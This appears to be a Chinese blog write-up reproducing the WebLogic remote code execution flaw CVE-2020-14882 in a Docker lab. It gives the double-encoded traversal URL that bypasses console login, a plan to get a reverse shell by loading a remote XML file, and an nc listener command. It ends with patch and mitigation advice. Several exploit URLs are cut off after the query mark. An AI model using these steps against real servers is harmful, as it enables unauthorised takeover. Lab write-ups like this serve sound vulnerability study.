CVE-2020-14882 WebLogic远程代码执行漏洞
CVE-2020-14882 WebLogic远程代码执行漏洞
1.漏洞描述
2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞(CVE-
2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者
可在未经身份验证的情况下控制 WebLogic Server Console ,并执行任意代码。
2020年10月29日, Oracle发布的漏洞补丁CVE-2020-14882存在可绕过的0day漏洞。即在Weblogic补丁
更新完成后,攻击者仍可绕过WebLogic后台登录等限制,并控制Weblogic服务器。
2.影响版本
plaintext
Oracle Weblogic Server 10.3.6.0.0 |
3.漏洞复现
首先进入CVE-2020-14882的docker环境
sudo docker-compose up -d
构造url 达到未授权登录
plaintext
http://192.168.0.159:7001/console/images/%252E%252E%252Fconsole.portal? |
但是这里没有部署安装的按钮,也就是说不能像常规进入后台后写shell进去,这里就需要用到远程加载
XML文件拿shell
首先测试以下漏洞代码执行是否成功,在/tmp/下创建一个test文件夹
plaintext
http://192.168.0.159:7001//console/images/%252E%252E%252Fconsole.portal? |
plaintext
sudo docker exec -it cve202014882_weblogic_1 /bin/bash |
plaintext
# reverse-bash.xml |
nc开启监听端口,访问
nc -lvnp 9999
plaintext
http://192.168.0.159:7001/console/images/%252E%252E%252Fconsole.portal? |
4.修复方案
修复建议
安装官方最新补丁进行升级:
plaintext
https://www.oracle.com/security-alerts/cpuapr2020.html |
临时措施:
由于该漏洞的补丁存在被绕过的风险,建议临时关闭后台/console/console.portal对外访问。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 是苹果啊!